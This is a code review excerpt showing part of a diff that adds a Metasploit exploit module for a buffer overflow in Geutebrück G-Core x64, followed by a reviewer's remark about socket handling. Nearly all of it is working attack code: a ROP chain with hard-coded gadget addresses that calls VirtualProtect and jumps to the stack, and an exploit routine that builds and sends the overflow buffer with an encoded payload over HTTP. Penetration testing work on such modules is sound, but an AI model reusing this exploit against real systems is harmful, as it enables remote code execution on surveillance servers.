modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb

```diff
@@ -0,0 +1,286 @@
+            # 0x14008f7ec      | POP RDX; RETN
+            # 0x...1000        | Value for VP "Size of Memory"
+            rop += [0x14008f7ec].pack('Q<')
+            rop += [0x0000000000000400].pack('Q<')
+
+            # 0x140a88f81:   | POP R8; RET
+            # 0x...40        | Value for VP "Execute Permissions"
+            rop += [0x140a88f81].pack('Q<')
+            rop += [0x0000000000000040].pack('Q<')
+
+            # 0x1400aa030    | POP R9; RET
+            # 0x...          | Value for VP "Writeable location". Not sure if needed?
+            # 0x140FB5000 is the .data section of gcore; let's test with this writable section...
+            rop += [0x1400aa030].pack('Q<')
+            rop += [0x140FB5000].pack('Q<')
+
+            # 0x140ccea2f: xor rax, rax ; et
+            rop += [0x140ccea2f].pack('Q<')
+
+            # 0x14000efa8 pop rax ; ret
+            # 0x140d83268 | VP Stub IAT Entry
+            rop += [0x14000efa8].pack('Q<')
+            rop += [0x140d83268].pack('Q<')
+
+            # 0x14095b254 mov rax, qword [rax] ; ret  ;
+            rop += [0x14095b254].pack('Q<')
+
+            # 0x140166c46 push rax; ret
+            rop += [0x140166c46].pack('Q<')
+
+            # 0x140cfb98d jmp rsp
+            rop += [0x140cfb98d].pack('Q<')
+
+            [rop, overwrite, stack_align]
+
+        else
+            print_status('ROP chain for this version not (yet) available or the target is not vulnerable.')
+
+        end
+      end
+
+    def exploit
+        if target['auto']
+            checkcode, target = fingerprint
+            if checkcode.to_s.include? 'unknown'
+                print_status('No vulnerable Version detected - exploit aborted.')
+            else
+                target_rop, target_overwrite, target_stack_align = ropchain(target)
+                begin
+                    connect
+                    print_status('Crafting Exploit...')
+
+                    http_req = 'GET /'
+                    buffer_200 = "\x41" * 200
+                    rop = target_rop
+                    payload.encoded
+                    buffer_1823 = "\x41" * 1823
+                    overwrite = target_overwrite
+                    stack_align = target_stack_align
+
+                    exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align
+                    print_status('Exploit ready for sending...')
+                    sock.put(exploit, 'Timeout' => 20)
+                    print_status('Exploit sent!')
+                    buf = sock.get_once || ''
+                rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+                    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+                ensure
+                    print_status('Closing socket.')
+                    disconnect
```

Comment:
If you use `Msf::Exploit::Remote::HttpClient` then you don't need to `disconnect` here.